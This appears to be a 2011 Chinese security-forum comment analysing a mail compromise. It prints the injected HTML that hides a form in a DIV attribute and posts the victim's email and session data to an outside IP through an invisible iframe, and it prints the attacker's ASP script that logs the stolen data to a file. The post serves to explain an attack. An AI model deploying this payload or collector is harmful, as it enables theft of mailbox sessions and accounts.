2011-07-03 14:32 |
晴天小铸 ( 普通白帽子 | Rank:106 漏洞数:31 | 退出黑客界的纠纷,低调求发展。)
helen 被人中招了<DIV id=abcb_ext1 title="<form name='my_form_' method='post' action=' http://210.40.132.155/Setting/a.asp' target='my_frame1_' > <input type='hidden' name='my_data_mail' value='305536777@qq.com'><input type='hidden' name='my_data_exte' value=''></form><iframe id='my_frame1_' height=0 name='my_frame1_' frameborder=0 scrolling=no></iframe> " style="DISPLAY: none"></DIV><XMP></XMP><STYLE type=text/css>#02 {layout-grid-line:"</XMP>"}</STYLE><XMP></XMP></DIV>这个是我们分析的 中招代码接收代码<%Function Format_Time(s_Time, n_Flag) Dim y, m, d, h, mi, s Format_Time = "" If IsDate(s_Time) = False Then Exit Function y = cstr(year(s_Time)) m = cstr(month(s_Time)) If len(m) = 1 Then m = "0" & m d = cstr(day(s_Time)) If len(d) = 1 Then d = "0" & d h = cstr(hour(FormatDateTime(s_Time, 4))) If len(h) = 1 Then h = "0" & h mi = cstr(minute(s_Time)) If len(mi) = 1 Then mi = "0" & mi s = cstr(second(s_Time)) If len(s) = 1 Then s = "0" & s Select Case n_Flag Case 0 ' yyyy-mm-dd_hh:mm:ss Format_Time = y & "-" & m & "-" & d & "_" & h & ":" & mi & ":" &s Case 1 ' yyyy-mm-dd hh:mm:ss Format_Time = y & "-" & m & "-" & d & " " & h & ":" & mi & ":" & s End SelectEnd Function%><%filename="tet.txt"set fso = Server.CreateObject("Scripting.FileSystemObject")set fout = fso.OpenTextFile(server.mappath("" & filename & ""), 8, true)ret1 = Request.Form("my_data_mail")ret2 = Request.Form("my_data_exte")userip = Request.ServerVariables("HTTP_X_FORWARDED_FOR")If userip = "" Then userip = Request.ServerVariables("REMOTE_ADDR") //IPEnd Ifstr1 = replace(ret1, "%20", "")str2 = replace(ret2, ";%20", ";")if len(str1) > 7 And len(str2) > 20 Thenfout.write Format_Time(now(), 0) & " " & str1 & "(" & userip & ")*" & str2 & chr(13) & chr(10)End Ifset fout=nothingset fso=nothing%>my_data_exte my_data_mail应该是 以前类似QQ空间 key的运用那些人进了helen邮箱想社helen支付宝但是helen有U盾 嘎嘎!
